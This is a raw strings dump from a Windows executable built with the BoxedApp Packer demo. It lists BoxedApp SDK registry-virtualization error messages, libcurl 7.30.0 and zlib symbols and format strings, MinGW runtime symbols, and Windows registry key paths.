It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
[email protected]
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# http://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
ftp://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
ftp://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
 malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
Failed connect to %s:%ld; %s
pInternal error clearing splay node = %d
Internal error removing splay node = %d
pPipe broke: handle 0x%p, url = %s
In state %d with no easy_conn, bail out!
Error while processing content unencoding: %s
1.2.8
1.2.0.4
px
%s:%s:%s
%s:%.*s
%s:%s:x:%s:%s:%s
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
Please call curl_multi_perform() soon
CURLSHcode unknown
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
Curl_ipv4_resolve_r failed for %s
%d.%d.%d.%d
d:d:d
d:d
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%s/%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s
00000001
12345678
%s xxxxxxxxxxxxxxxx
- Conn %d (%p) send_pipe: %d, recv_pipe: %d
Server %s is blacklisted
Server %s is not blacklisted
Site %s:%d is pipeline blacklisted
Adding handle: send: %d
Adding handle: recv: %d
Conn: %d (%p) Receive pipe weight: (%d/%d), penalized: %d
curl_easy_duphandle
curl_easy_escape
curl_easy_getinfo
curl_easy_pause
curl_easy_recv
curl_easy_send
curl_easy_strerror
curl_easy_unescape
curl_escape
curl_formadd
curl_formfree
curl_formget
curl_free
curl_getdate
curl_getenv
curl_global_cleanup
curl_global_init_mem
curl_maprintf
curl_mfprintf
curl_mprintf
curl_msnprintf
curl_msprintf
curl_multi_add_handle
curl_multi_assign
curl_multi_cleanup
curl_multi_fdset
curl_multi_info_read
curl_multi_init
curl_multi_perform
curl_multi_remove_handle
curl_multi_setopt
curl_multi_socket
curl_multi_socket_action
curl_multi_socket_all
curl_multi_strerror
curl_multi_timeout
curl_multi_wait
curl_mvaprintf
curl_mvfprintf
curl_mvprintf
curl_mvsnprintf
curl_mvsprintf
curl_share_cleanup
curl_share_init
curl_share_setopt
curl_share_strerror
curl_strequal
curl_strnequal
curl_unescape
curl_version_info
ADVAPI32.DLL
WS2_32.DLL
zlib1.dll
8 8$8(8,808
2 2$2(2,2024282
DllMainCRTStartup
GNU C 4.2.1-sjlj (mingw32-2)
/home/ron/devel/debian/mingw32-runtime/mingw32-runtime-3.13/build_dir/src/mingw-runtime-3.13-20070825-1/dllcrt1.c
 DllMainCRTStartup@12
dllcrt1.c
.file
http.c
ftp.c
url.c
_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
